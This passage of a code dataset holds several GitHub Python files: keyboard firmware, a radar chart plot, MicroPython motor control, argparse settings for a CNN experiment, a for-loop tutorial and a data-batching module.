self._toggled_keys.remove(key)\n if key in self._waiting_keys:\n self._waiting_keys.remove(key)\n self._deactivate_key(key, keyboard)\n\n def _deactivate_key(self, key, keyboard):\n keyboard.cancel_timeout(self._active_keys[key])\n self._active_keys.pop(key)\n\n def during_bootup(self, keyboard):\n return\n\n def before_matrix_scan(self, keyboard):\n return\n\n def before_hid_send(self, keyboard):\n return\n\n def after_hid_send(self, keyboard):\n return\n\n def on_powersave_enable(self, keyboard):\n return\n\n def on_powersave_disable(self, keyboard):\n return\n\n def after_matrix_scan(self, keyboard):\n return\n","repo_name":"KMKfw/kmk_firmware","sub_path":"kmk/modules/rapidfire.py","file_name":"rapidfire.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":1113,"dataset":"github-code","pt":"54"} +{"seq_id":"73110575200","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n# def result_pic(result):\n# \"\"\"\n# Draw the radar chart\n# :param result: classification data\n# :return: radar chart\n# \"\"\"\n# # parse out the category labels and kinds\n# labels = ['I', 'M', 'C', 'Vin', 'Ver']\n# kinds = 1\n# result=pd.read_excel('wzsj.xlsx')\n#\n# # radar-chart data must close on itself, so append column L again and convert to np.ndarray\n# result = pd.concat([result, result[['L']]], axis=1)\n# centers = np.array(result.iloc[:, 1:])\n#\n# # divide the circumference and close the polygon\n# n = len(labels)\n#\n#\n# angle = np.linspace(0, 2 * np.pi, n, endpoint=False)\n# angle = np.concatenate((angle, [angle[0]]))\n#\n# # plot\n# fig = plt.figure()\n# ax = fig.add_subplot(111, polar=True) # the polar parameter draws in polar coordinates\n#\n# # draw the lines\n# for i in range(len(kinds)):\n# ax.plot(angle, centers[i], linewidth=2, label=kinds[i])\n# # ax.fill(angle, centers[i]) # fill the background color\n#\n# # add the attribute labels\n# ax.set_thetagrids(angle * 180 / np.pi, labels)\n# plt.title('different kind')\n# plt.legend(loc='lower right')\n# plt.show()\n#\n# if __name__ == '__main__':\n# result = pd.read_csv('./data_7/cluster_center.csv', sep=',')\n# result_pic(result)\nlabels = np.array(['I','M','S','Vin','Ver'])\n# number of data points\ndataLenth = 5\n
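# Added note (illustrative): a radar outline must end where it starts; the\n# np.concatenate calls below re-append the first element, e.g. [a, b, c] -> [a, b, c, a].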
\n# data values\ndata = np.array([0.92,0.9,0.7,1,0])\n#======== end of user-set values ============\n\nangles = np.linspace(0, 2*np.pi, dataLenth, endpoint=False)\ndata = np.concatenate((data, [data[0]])) # close the polygon\nangles = np.concatenate((angles, [angles[0]])) # close the polygon\n\nfig = plt.figure()\nax = fig.add_subplot(111, polar=True)# the polar parameter!!\nax.plot(angles, data, 'bo-', linewidth=2)# draw the line\nax.fill(angles, data, facecolor='r', alpha=0.25)# fill\nax.set_thetagrids(angles * 180/np.pi, labels, fontproperties=\"SimHei\")\nax.set_title(\"top2\", va='bottom', fontproperties=\"SimHei\")\nax.set_rlim(0,1)\nax.grid(True)\nplt.show()","repo_name":"jzhoujg/2020MCMCCODES","sub_path":"randa.py","file_name":"randa.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34935876058","text":"import gc\nimport pyb\nimport cotask\nimport task_share\nimport time\n\nfrom positioncontrol import PositionControlTask\nfrom motordriver import MotorDriver\nfrom encoderdriver import EncoderDriver\n\n\n\ndef system_1 ():\n \"\"\"!\n Task which facilitates the motor position control method and records\n motor 1 data in a queue. The task then prints the data which is controlled\n by a generator.\n \"\"\"\n \n ## State variable used to signal program whether to collect data, print\n # data, or terminate program.\n state = 0\n \n while True:\n \n ## Updates Current Time\n if(state == 0):\n \n # Runs position control function from positioncontrol.py\n control_A.position_control()\n \n ## Current time at which the position data is collected\n current_time_A = time.ticks_diff(time.ticks_ms(), start_time)\n \n if current_time_A > 5000:\n state = 1\n \n # Collect time list data if the queue is not full\n if time_list_A.full() == False:\n # Creates a list of Time data\n time_list_A.put(current_time_A)\n\n # Collect position data if the queue is not full \n if Position_A.full() == False:\n # Creates a list of Position data\n Position_A.put(enc_A.get_position())\n else:\n pass\n \n # States to print data\n elif state == 1:\n print('\\nTime List A\\n')\n state = 2\n \n elif state == 2:\n if time_list_A.any():\n print(time_list_A.get())\n else:\n state = 3\n \n elif state == 3:\n print('\\nEncoder Position A\\n')\n state = 4\n \n elif state == 4:\n if Position_A.any():\n print(Position_A.get())\n else:\n state = 5\n \n elif state == 5:\n print('\\nTime List B\\n')\n state = 6\n \n elif state == 6:\n if time_list_B.any():\n print(time_list_B.get())\n else:\n state = 7\n \n elif state == 7:\n print('\\nEncoder Position B\\n')\n state = 8\n \n elif state == 8:\n if Position_B.any():\n print(Position_B.get())\n else:\n state = 9\n \n # Terminate program with share0 flag\n elif (state == 9):\n print('Data has been collected')\n state = 10\n share0.put(1)\n elif (state == 10):\n pass\n\n yield (0)\n \ndef system_2 ():\n \"\"\"!\n Task which facilitates the motor position control method and records\n motor 2 data in a queue. 
The data is printed later by the\n system_1 task.\n \"\"\"\n \n ## State variable used to signal program whether to collect data, print\n # data, or terminate program.\n state = 0\n \n while True:\n\n if (state == 0):\n \n # Runs position control function from positioncontrol.py\n control_B.position_control()\n \n ## Current time at which the position data is collected\n current_time_B = time.ticks_diff(time.ticks_ms(), start_time)\n \n if current_time_B > 5000:\n state = 1\n \n if time_list_B.full() == False:\n # Creates a list of Time data\n time_list_B.put(current_time_B)\n \n # Collect Position data if queue is not full\n if Position_B.full() == False:\n Position_B.put(enc_B.get_position())\n \n else:\n break\n \n elif (state == 1):\n pass\n \n yield (0)\n\ndef user_task ():\n \n \"\"\"!\n Task which puts things into a share and a queue.\n \"\"\"\n yield(0)\n\n# This code creates important Queue and Share variables, then starts the tasks. \n# The tasks run until the motors have reached desired position within 5 seconds\n# and data has been printed, at which time the scheduler stops and printouts \n# show diagnostic information about the tasks, share, and queue.\nif __name__ == \"__main__\":\n print ('\\033[2JTesting ME405 stuff in cotask.py and task_share.py\\r\\n'\n 'Press ENTER to stop and show diagnostics.')\n \n \n #>>>>> Initializing Class Personal Objects <<<<<<\n\n ## Creates the motor object for motor B\n motor_B = MotorDriver(pyb.Pin.board.PA0, pyb.Pin.board.PA1, pyb.Pin.board.PC1, 5)\n\n ## Creates the motor object for motor A\n motor_A = MotorDriver(pyb.Pin.board.PB4, pyb.Pin.board.PB5, pyb.Pin.board.PA10, 3)\n\n ## Creates the encoder object for encoder B\n enc_B = EncoderDriver(pyb.Pin.board.PC6, pyb.Pin.board.PC7, 8)\n\n ## Creates the encoder object for encoder A\n enc_A = EncoderDriver(pyb.Pin.board.PB6, pyb.Pin.board.PB7, 4)\n\n ## Create the position control object for system A\n control_A = PositionControlTask(motor_A, enc_A)\n\n ## Creates the position control object for system B\n control_B = PositionControlTask(motor_B, enc_B)\n \n # Asking user to specify set point and gain for motor 1\n print('motor 1')\n control_A.set_point()\n \n control_A.set_gain()\n \n # Asking user to specify set point and gain for motor 2\n print('motor 2')\n control_B.set_point()\n \n control_B.set_gain()\n \n # Initializing Share Objects\n \n # Shares\n # def __init__ (self, type_code, thread_protect = True, name = None):\n \n # Queue\n # def __init__ (self, type_code, size, thread_protect = True, \n # overwrite = False, name = None):\n \n ## Creates the position Queue object\n Setpos_A = task_share.Queue('i', True, name = 8)\n \n ## Creates the position of motor 1 Queue object\n Position_A = task_share.Queue('i', size = 250, thread_protect = False,\n overwrite = False, name = 1)\n\n ## Creates the position of motor 2 Queue object\n Position_B = task_share.Queue('i', size = 250, thread_protect = False,\n overwrite = False, name = 2)\n\n ## Creates the time storage Queue for motor 1\n time_list_A = task_share.Queue('i', size = 250, thread_protect = False,\n overwrite = False, name = 5)\n \n ## Creates the time storage Queue for motor 2\n time_list_B = task_share.Queue('i', size = 250, thread_protect = False,\n overwrite = False, name = 6)\n \n ## Start time to reference relative time of data recording\n start_time = time.ticks_ms()\n \n ## Counter to measure number of runs through queue\n counter_2 = 0\n \n ## Counter to measure number of runs through queue\n counter_1 = 0\n 
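\n # Added usage sketch (comments only, mirrors system_1's print states above):\n # while Position_A.any():\n # print(Position_A.get())\n # Queue.any() reports whether data is waiting; get() removes one item.\n 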
\n #>>> Start of Example Code From Ridgely<<<\n\n ## Create a flag as a Shared variable to signal the schedular should stop\n share0 = task_share.Share ('i', thread_protect = False, name = \"Share 0\")\n \n #q0 = task_share.Queue ('L', 16, thread_protect = False, overwrite = False,\n # name = \"Queue 0\")\n\n # Create the tasks. If trace is enabled for any task, memory will be\n # allocated for state transition tracing, and the application will run out\n # of memory after a while and quit. Therefore, use tracing only for \n # debugging and set trace to False when it's not needed\n \n ## Task 1 used to operate motor 1 function task\n task1 = cotask.Task (system_1, name = 'Task_1', priority = 1, \n period = 50, profile = True, trace = False)\n \n ## Task 2 used to operate motor 2 function task\n task2 = cotask.Task (system_2, name = 'Task_2', priority = 1, \n period = 50, profile = True, trace = False)\n \n \n # Add tasks to cotask schedular list\n cotask.task_list.append (task1)\n cotask.task_list.append (task2)\n\n # Run the memory garbage collector to ensure memory is as defragmented as\n # possible before the real-time scheduler is started\n gc.collect ()\n\n # Run the scheduler with the chosen scheduling algorithm. Quit if the flag\n # variable share0 has been set to 1 by the task state machine after \n # printing the data.\n \n ## Initializes VCP so that the program sees keyboard strokes.\n vcp = pyb.USB_VCP ()\n vcp.read()\n \n while share0.get() != 1:\n cotask.task_list.pri_sched()\n\n \n # Empty the comm port buffer of the character(s) just pressed\n vcp.read ()\n\n # Print a table of task data and a table of shared information data\n print ('\\n' + str (cotask.task_list))\n print (task_share.show_all ())\n print (task1.get_trace ())\n print ('\\r\\n')","repo_name":"Wyattc99/ME-405-Lab-3","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19479770829","text":"\"\"\"\nSupported arguments for train and evaluation.\n\"\"\"\n\nimport argparse\n\n\ndef train_arg_parser(argvs, extra_args_fun=None):\n parser = _common_arg_parser(description='Contrast discrimination training')\n\n _add_optimisation_group(parser)\n\n misc_group = parser.add_argument_group('miscellaneous')\n misc_group.add_argument(\n '--random_seed',\n default=None,\n type=int,\n help='To make the results more reproducible (default: None)'\n )\n misc_group.add_argument(\n '--train_params',\n default=None,\n type=str,\n help='Path to a predefined set of parameters (default: None)'\n )\n misc_group.add_argument(\n '--sf_filter',\n default=None,\n nargs='+',\n type=float,\n help='Filtering images with spatial freq (default: None)'\n )\n\n if extra_args_fun is not None:\n extra_args_fun(parser)\n\n args = parser.parse_args(argvs)\n args.colour_space = _check_dataset_space(args)\n return args\n\n\ndef test_arg_parser(argvs, extra_args_fun=None):\n parser = _common_arg_parser(description='Contrast discrimination testing')\n\n _add_optimisation_group(parser)\n _add_lesion_group(parser)\n\n misc_group = parser.add_argument_group('csf')\n misc_group.add_argument(\n '--freqs',\n default=None,\n nargs='+',\n type=float,\n help='The frequencies to be tested (default: None)'\n )\n\n if extra_args_fun is not None:\n extra_args_fun(parser)\n\n args = parser.parse_args(argvs)\n args.colour_space = _check_dataset_space(args)\n return args\n\n\ndef _check_dataset_space(args):\n # NOTE: a hack to 
handle preprocessing\n if 'taskonomy' in args.architecture:\n colour_space = 'taskonomy_rgb'\n elif 'clip' in args.architecture:\n colour_space = 'clip_rgb'\n else:\n colour_space = args.colour_space\n return colour_space\n\n\ndef activation_arg_parser(argvs, extra_args_fun=None):\n parser = _common_arg_parser(description='Contrast stimuli activation')\n\n _add_optimisation_group(parser)\n _add_lesion_group(parser)\n\n misc_group = parser.add_argument_group('gratings')\n misc_group.add_argument(\n '--stimuli',\n default=None,\n type=str,\n choices=['grating_radius'],\n help='The type of stimuli (default: None)'\n )\n\n if extra_args_fun is not None:\n extra_args_fun(parser)\n\n args = parser.parse_args(argvs)\n return args\n\n\ndef _common_arg_parser(description='No description!'):\n parser = ArgumentParser(description=description)\n\n _add_dataset_group(parser)\n _add_network_group(parser)\n _add_logging_group(parser)\n _add_routine_group(parser)\n _add_input_group(parser)\n\n return parser\n\n\ndef _add_logging_group(parser):\n logging_group = parser.add_argument_group('logging')\n\n logging_group.add_argument(\n '--output_dir',\n type=str,\n default='../outputs/',\n help='The path to the output directory (default: ../outputs/)'\n )\n logging_group.add_argument(\n '--experiment_name',\n type=str,\n default='anonymous',\n help='The name of the experiment (default: anonymous)'\n )\n logging_group.add_argument(\n '--print_freq',\n type=int,\n default=100,\n help='Frequency of reporting (default: 100)'\n )\n logging_group.add_argument(\n '--save_all',\n action='store_true',\n default=False,\n help='Saving all check points (default: False)'\n )\n logging_group.add_argument(\n '--visualise',\n action='store_true',\n default=False,\n help='Visualising the input images to network (default: False)'\n )\n\n\ndef _add_routine_group(parser):\n routine_group = parser.add_argument_group('routine')\n\n routine_group.add_argument(\n '--gpu',\n default=0,\n type=int,\n help='Which GPU to use (default: 0)'\n )\n routine_group.add_argument(\n '-j', '--workers',\n default=1,\n type=int,\n help='Number of workers for image generator (default: 1)'\n )\n routine_group.add_argument(\n '-b', '--batch_size',\n default=16,\n type=int,\n help='Batch size (default: 16)'\n )\n\n\ndef _add_network_group(parser):\n network_group = parser.add_argument_group('optimisation')\n\n network_group.add_argument(\n '-aname', '--architecture',\n required=True,\n type=str,\n help='Name of the architecture or network'\n )\n network_group.add_argument(\n '--resume',\n default=None,\n type=str,\n help='Path to the latest checkpoint (default: None)'\n )\n network_group.add_argument(\n '--transfer_weights',\n default=None,\n nargs='+',\n type=str,\n help='Whether transferring weights from a model (default: None)'\n )\n\n\ndef _add_optimisation_group(parser):\n optimisation_group = parser.add_argument_group('optimisation')\n\n optimisation_group.add_argument(\n '-lr', '--learning_rate',\n default=0.1,\n type=float,\n help='The learning rate parameter (default: 0.1)'\n )\n optimisation_group.add_argument(\n '--momentum',\n default=0.9,\n type=float,\n help='The momentum for optimisation (default 0.9)'\n )\n optimisation_group.add_argument(\n '-wd', '--weight_decay',\n default=1e-4,\n type=float,\n help='The decay weight parameter (default: 1e-4)'\n )\n optimisation_group.add_argument(\n '-e', '--epochs',\n default=90,\n type=int,\n help='Number of epochs (default: 90)'\n )\n optimisation_group.add_argument(\n '--initial_epoch',\n 
default=0,\n type=int,\n help='The initial epoch number (default: 0)'\n )\n optimisation_group.add_argument(\n '--classifier',\n default='nn',\n type=str,\n choices=[\n 'nn',\n 'linear_svm',\n 'svm',\n ],\n help='Type of the linear classifier (default: nn)'\n )\n\n\ndef _add_input_group(parser):\n input_group = parser.add_argument_group('input')\n\n input_group.add_argument(\n '--colour_space',\n default='rgb',\n type=str,\n choices=[\n 'rgb', 'imagenet_rgb', 'taskonomy_rgb',\n 'lab',\n 'grey', 'grey3'\n ],\n help='The colour space of network (default: rgb)'\n )\n input_group.add_argument(\n '--vision_type',\n default='trichromat',\n type=str,\n choices=[\n 'trichromat',\n 'monochromat',\n 'dichromat_rg',\n 'dichromat_yb'\n ],\n help='The vision type of the network (default: trichromat)'\n )\n input_group.add_argument(\n '--target_size',\n required=True,\n type=int,\n help='Target size'\n )\n input_group.add_argument(\n '--contrast_space',\n default=None,\n type=str,\n help='The channel where contrast is manipulated (default: None)'\n )\n input_group.add_argument(\n '--same_transforms',\n action='store_true',\n default=False,\n help='Applying same transforms to left/right images (default: False)'\n )\n input_group.add_argument(\n '--mask_image',\n default=None,\n type=str,\n choices=['gaussian', 'fixed_cycle', 'fixed_size'],\n help='Type of mask image (default: None)'\n )\n input_group.add_argument(\n '--grating_detector',\n action='store_true',\n default=False,\n help='Performing the task of grating detector (default: False)'\n )\n input_group.add_argument(\n '--contrasts',\n default=None,\n nargs='+',\n type=float,\n help='The contrasts to be tested (default: None)'\n )\n input_group.add_argument(\n '--illuminant',\n default=None,\n nargs='+',\n type=float,\n help='Illuminant value in the range of -0.5 to 0.5 (default: None)'\n )\n\n\ndef _add_dataset_group(parser):\n dataset_group = parser.add_argument_group('dataset')\n\n dataset_group.add_argument(\n '-dname', '--dataset',\n type=str,\n help='Name of the dataset'\n )\n dataset_group.add_argument(\n '--data_dir',\n type=str,\n default=None,\n help='The path to the data directory (default: None)'\n )\n dataset_group.add_argument(\n '--train_dir',\n type=str,\n default=None,\n help='The path to the train directory (default: None)'\n )\n dataset_group.add_argument(\n '--validation_dir',\n type=str,\n default=None,\n help='The path to the validation directory (default: None)'\n )\n dataset_group.add_argument(\n '--train_samples',\n type=int,\n default=None,\n help='Number of training samples (default: All)'\n )\n dataset_group.add_argument(\n '--val_samples',\n type=int,\n default=None,\n help='Number of validation samples (default: All)'\n )\n\n\ndef _add_lesion_group(parser):\n network_manipulation_group = parser.add_argument_group('lesion')\n\n network_manipulation_group.add_argument(\n '--lesion_kernels',\n nargs='+',\n type=str,\n default=None,\n help='First layer name followed by kernel indices (default: None)'\n )\n network_manipulation_group.add_argument(\n '--lesion_planes',\n nargs='+',\n type=str,\n default=None,\n help='Axis number followed by plane indices ax_ (default: None)'\n )\n network_manipulation_group.add_argument(\n '--lesion_lines',\n nargs='+',\n type=str,\n default=None,\n help='Intersection of two planes, ___ (default: None)'\n )\n\n\nclass ArgumentParser(argparse.ArgumentParser):\n \"\"\"\n Overriding the add_argument_group function. 
If a group already exists, it\n returns it, otherwise creates a new group and returns it.\n \"\"\"\n\n def add_argument_group(self, *args, **kwargs):\n ignore = ['positional arguments', 'optional arguments']\n if (\n args[0] in ignore or\n ('title' in kwargs.keys() and kwargs['title'] in ignore)\n ):\n return super().add_argument_group(*args, **kwargs)\n for group in self._action_groups:\n if (\n group.title == args[0] or\n ('title' in kwargs and group.title == kwargs['title'])\n ):\n return group\n return super().add_argument_group(*args, **kwargs)\n","repo_name":"ArashAkbarinia/DeepCSF","sub_path":"src/deepcsf/utils/argument_handler.py","file_name":"argument_handler.py","file_ext":"py","file_size_in_byte":10613,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"18542631324","text":"# -----------------\n# -- Loop => For --\n# -----------------\n# for item in iterable_object :\n# Do Something With Item\n# -----------------------------\n# item Is A Variable You Create and Call Whenever You Want\n# item refers to the current position and will run and visit all items to the end\n# iterable_object => Sequence [ list, tuples, set, dict, string of characters, etc ... ]\n# ---------------------------------------------------------------\n\nmyNumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\nfor number in myNumbers:\n # print(number * 17)\n\n if number % 2 == 0: # Even\n print(f\"The Number {number} Is Even.\")\n\n else:\n print(f\"The Number {number} Is Odd.\")\n\nelse:\n print(\"The Loop Is Finished\")\n\nmyName = \"Osama\"\n\nfor letter in myName:\n print(f\" [ {letter.upper()} ] \")\n\nprint(\"===================================================\")\n\n# -----------------\n# -- Loop => For --\n# -- Trainings --\n# -----------------\n\n# Range\n\nmyRange = range(1, 101)\n\nfor number in myRange:\n\n print(number)\n\n# Dictionary\n\nmySkills = {\n \"Html\": \"90%\",\n \"Css\": \"60%\",\n \"PHP\": \"70%\",\n \"JS\": \"80%\",\n \"Python\": \"90%\",\n \"MySQL\": \"60%\"\n}\n\nprint(mySkills['JS'])\nprint(mySkills.get(\"Python\"))\n\nfor skill in mySkills:\n\n #print(skill) # will print the keys\n\n print(f\"My Progress in Lang {skill} Is: {mySkills.get(skill)}\")\n\nprint(\"===================================================\")\n\n# -----------------\n# -- Loop => For --\n# -- Nested Loop --\n# -----------------\n\npeoples = [\"Osama\", \"Ahmed\", \"Sayed\", \"Ali\"]\n\nskills = ['Html', 'Css', 'Js']\n\nfor name in peoples: # Outer Loop\n\n print(f\"{name} Skills Is: \")\n\n for skill in skills: # Inner Loop\n\n print(f\"- {skill}\")\n\n# Dictionary\n\npeoples = {\n \"Osama\": {\n \"Html\": \"70%\",\n \"Css\": \"80%\",\n \"Js\": \"70%\"\n },\n \"Ahmed\": {\n \"Html\": \"90%\",\n \"Css\": \"80%\",\n \"Js\": \"90%\"\n },\n \"Sayed\": {\n \"Html\": \"70%\",\n \"Css\": \"60%\",\n \"Js\": \"90%\"\n }\n}\n\nprint(peoples[\"Osama\"])\nprint(peoples[\"Ahmed\"])\nprint(peoples[\"Sayed\"])\n\nprint(peoples[\"Osama\"]['Css'])\nprint(peoples[\"Ahmed\"]['Css'])\nprint(peoples[\"Sayed\"]['Css'])\n\nfor name in peoples:\n\n print(f\"Skills and Progress For {name} Is: \")\n\n for skill in peoples[name]:\n\n print(f\"{skill.upper()} => {peoples[name][skill]}\")\n\nprint(\"===================================================\")\n\n# ---------------------------\n# -- Break, Continue, Pass --\n# ---------------------------\n\nmyNumbers = [1, 2, 3, 5, 7, 10, 13, 14, 15, 19]\n\n# Continue => to skip the current iteration\n\nfor number in myNumbers:\n\n if number == 13:\n\n 
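# added note: with 13 skipped below, this loop prints 1 2 3 5 7 10 14 15 19\n 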
continue # stop here and skip this iteration\n\n print(number)\n\nprint(\"#\" * 50)\n\n# Break\n\nfor number in myNumbers:\n\n if number == 13:\n\n break # exit the loop entirely\n\n print(number)\n\nprint(\"#\" * 50)\n\n# Pass\n\nfor number in myNumbers:\n\n if number == 13:\n\n pass # the if condition is written but its body is not decided yet, so \"pass\" keeps it from being empty\n\n print(number)\n\nprint(\"===================================================\")\n\n# ------------------------------\n# -- Advanced Dictionary Loop --\n# ------------------------------\n\nmySkills = {\n \"HTML\": \"80%\",\n \"CSS\": \"90%\",\n \"JS\": \"70%\",\n \"PHP\": \"80%\"\n}\n\nprint(mySkills.items())\n\n#######################\n\nfor skill in mySkills:\n\n print(f\"{skill} => {mySkills[skill]}\")\n\nprint(\"#\"*30)\n\nfor skill_key, skill_progress in mySkills.items():\n\n print(f\"{skill_key} => {skill_progress}\")\n\nprint(\"#\"*30)\n\nmyUltimateSkills = {\n \"HTML\": {\n \"Main\": \"80%\",\n \"Pugjs\": \"80%\"\n },\n \"CSS\": {\n \"Main\": \"90%\",\n \"Sass\": \"70%\"\n }\n}\n\nfor main_key, main_value in myUltimateSkills.items():\n\n print(f\"{main_key} Progress Is: \")\n\n for child_key, child_value in main_value.items():\n\n print(f\"- {child_key} => {child_value}\")\n\n","repo_name":"NadaHe/python","sub_path":"for_loop.py","file_name":"for_loop.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70996771363","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nTitle: Shearlet based CNN vs. simple MLP in Fashion MNIST.\n\t\nCreated on Mon June 30 17:44:29 2020\n\n@author: Manny Ko & Ujjawal.K.Panchal \n\n\"\"\"\n#import logging\nfrom cplxmodule import cplx #new import.\nimport os, sys, time\nimport abc\nimport numpy as np\nfrom collections import namedtuple, Counter\nimport asyncio\n\n#our modules\nfrom shnetutil import projconfig\nfrom shnetutil.dataset import dataset_base\nfrom shnetutil.utils import torchutils\n\nfrom pyutils.testutil import time_spent\n\n\nkVerifyResults=False\n\n# See Docs/DataPipeline/mk_datapipelin.pdf\n# Key Influences: \n#\t- Batch Augmentation: https://arxiv.org/abs/1705.08741\n#\t- Minibatch persistency: https://arxiv.org/abs/1806.07353\n#\t- Data Echoing: https://arxiv.org/abs/1907.05550\n#\t- Bagging: \n\n# https://pymotw.com/3/asyncio/executors.html\n\nclass BatchBuilderBase(metaclass=abc.ABCMeta):\n\t\"\"\" A batch generator with support for asyncio and MP xform/augmentation,\n\t\tdata echoing etc.\n\t\"\"\"\n\tdef __init__(\n\t\tself,\n\t\tdataset,\t\t\t#utils.data.Dataset\n\t\tbatchsize=16,\n\t\tbuffersize=128,\t\t#size of our shuffle buffer\n\t\tnum_workers = 4,\t#TODO: not implemented yet\n\t\tseed=1234, \n\t\tshuffle = True,\t\t#we almost always want to shuffle\n\t):\n\t\tself.dataset = dataset\n\t\tself.batchsize = batchsize\n\t\tself.buffersize = buffersize\n\t\tself.num_workers = num_workers\n\t\tself.shuffle = shuffle\n\t\tself.size = len(dataset)\n\t\tself.indices = np.arange(self.size)\n\n\tdef __len__(self):\n\t\treturn self.size\n\n\tdef reset(self):\n\t\tpass\n\n\tdef xformbatch(self, batch):\n\t\treturn batch\n\n\tdef finalize(self):\n\t\tpass\t\n\n\t@abc.abstractmethod\n\tdef epoch(self, kLogging=False):\n\t\t\"\"\" our generator which will emit batches 1 at a time for an epoch \"\"\"\n\t\tpass\n\n\t@abc.abstractmethod\n\tdef rand_indices(self, num):\t\n\t\tpass\n\n\t@property\n\tdef shuffle_buf(self):\n\t\t\"\"\" Shuffle buffer - see https://arxiv.org/abs/1907.05550 \"\"\"\n\t\treturn self.indices\n#end of BatchBuilderBase\n
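\n# NOTE (added sketch, not in the original file): data echoing reuses\n# builder.cur_batch - a client may replay the same indices for a few extra\n# steps before drawing a new batch, e.g.:\n#\tfor indices in builder.epoch():\n#\t\tfor _ in range(echo_factor):\t# echo_factor is an assumed name\n#\t\t\timages, labels = getBatchAsync(builder.dataset, indices)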
\n\ndef getWeights(dataset):\n\t\"\"\" returns a list of weights suitable for WeightedRandomSampler or torch.multinomial.\n\tSee https://github.com/ufoym/imbalanced-dataset-sampler/blob/master/torchsampler/imbalanced.py \n\t\"\"\"\n\tlabels = getattr(dataset, 'labels', [item.label for item in dataset])\n\tlabelcnt = Counter(labels)\n\tweights = [1.0 / labelcnt[item.label] for item in dataset]\n\t#print(len(weights), np.unique(weights))\n\n\treturn weights\n\nclass BatchBuilder(BatchBuilderBase):\n\t\"\"\" A batch generator with support for asyncio and MP xform/augmentation \"\"\"\n\tdef __init__(\n\t\tself,\n\t\tdataset,\t\t\t#utils.data.Dataset\n\t\tbatchsize=16,\n\t\tbuffersize=128,\t\t#size of our shuffle buffer\n\t\tnum_workers = 4,\t#TODO: not implemented yet\n\t\tseed=1234, \n\t\tshuffle = True,\t\t#we almost always want to shuffle\n\t):\n\t\tsuper().__init__(dataset, batchsize, buffersize, num_workers, seed, shuffle)\n\t\t#TODO: use 'buffersize' - currently we are using a shuffle buffer the size of the input\n\n\t\t#https://numpy.org/doc/stable/reference/random/index.html\n\t\tss = np.random.SeedSequence(seed)\n\t\tchild_seeds = ss.spawn(num_workers)\t\t#TODO: for MP code\n\t\tself.rng = np.random.Generator(np.random.PCG64(ss))\t#PCG64|MT19937\n\t\tself.cur_batch = None \n\n\tdef xformbatch(self, batch):\n\t\treturn batch\n\n\tdef rand_indices(self, num):\t\n\t\tindices = self.rng.integers(low=0, high=self.size, size=num)\n\t\treturn indices\n\n\tdef doshuffle(self):\n\t\tif self.shuffle:\n\t\t\tself.rng.shuffle(self.indices)\n\n\tdef epoch(self, kLogging=False):\n\t\t\"\"\" our generator which will emit batches 1 at a time for an epoch \"\"\"\n\t\tself.doshuffle()\n\t\t\n\t\tif kLogging:\t\n\t\t\tprint(f\"indices: {self.indices} {self.indices.dtype}\")\n\n\t\tnumentries = len(self.dataset)\n\t\tbatchsize = self.batchsize\n\t\tfor start in range(0, numentries, batchsize):\n\t\t\tend = min(start + batchsize, numentries)\n\t\t\tbatch = self.indices[start:end]\n\t\t\tself.cur_batch = self.xformbatch(batch)\n\t\t\tyield self.cur_batch \t#GENERATOR\n#end.. class BatchBuilder\t\t\t\n\nclass BatchIterator():\n\tdef __init__(\n\t\tself,\n\t\tbatchbuilder\n\t):\n\t\tassert(isinstance(batchbuilder, BatchBuilderBase))\n\t\tself.builder = batchbuilder\n\t\tself.batch_num = None\n\n\tdef __iter__(self):\n\t\t\"\"\" iterator support - i.e. 
iter() \"\"\"\n\t\tself.batch_num = 0\n\t\treturn self\n\n\tdef __next__(self):\n\t\t\"\"\" Torch style batch iterator \n\t\t\tResult: (images, labels)\n\t\t\"\"\"\n\t\tbuilder = self.builder\n\t\tnumentries = builder.size\n\t\tbatchsize = builder.batchsize\n\n\t\tbatch_num = self.batch_num\n\t\toffset = batch_num * batchsize\n\t\tself.batch_num += 1\n\t\tif offset >= numentries: \n\t\t\traise StopIteration \n\t\tend = min(offset + batchsize, numentries)\n\t\t# Bagging here - sample with replacement\n\t\tindices = builder.indices[offset:end]\n\t\tindices = builder.rand_indices(len(indices))\n\t\tbuilder.cur_batch = indices \t\t#for Minibatch persistency and Data Echoing\n\t\timages, labels = getBatchAsync(builder.dataset, indices)\n\t\treturn images, labels\n\n\nclass Bagging(BatchBuilder):\n\t\"\"\" Use Bagging sampling to generate batches \"\"\"\n\t#TODO: Try without-replacement sampling https://papers.nips.cc/paper/6245-without-replacement-sampling-for-stochastic-gradient-methods\n\tdef __init__(\n\t\tself,\n\t\tdataset,\t\t\t#utils.data.Dataset\n\t\tbatchsize=16,\n\t\tbuffersize=128,\t\t#size of our shuffle buffer\n\t\tnum_workers = 4,\t#TODO: not implemented yet\n\t\tseed=1234, \n\t\tshuffle = False,\n\t):\n\t\tsuper().__init__(dataset, batchsize, buffersize, num_workers, seed, shuffle)\n\t\tself.cur_batch = -1\n\n\t#iterator support - i.e. iter()\t\n\tdef __iter__(self):\n\t\t\"\"\" \"\"\"\n\t\tself.batch_num = 0\n\t\treturn self\t\t#TODO: implement a standalone iterator object (to support multiple iter)\n\n\tdef __next__(self):\n\t\t\"\"\" Torch style batch iterator \n\t\t\tResult: (images, labels)\n\t\t\"\"\"\n\t\tnumentries = self.size\n\t\tbatchsize = self.batchsize\n\t\tbatch_num = self.batch_num\n\t\toffset = batch_num * batchsize\n\t\tself.batch_num += 1\n\t\tif offset >= numentries: \n\t\t\traise StopIteration \n\t\tend = min(offset + batchsize, numentries)\n\t\t# Bagging here - sample with replacement\n\t\tindices = self.indices[offset:end]\n\t\tindices = self.rand_indices(len(indices))\n\t\tself.cur_batch = indices \t\t#for Minibatch persistency and Data Echoing\n\t\timages, labels = getBatchAsync(self.dataset, indices)\n\t\treturn images, labels\n\n\tdef epoch(self, 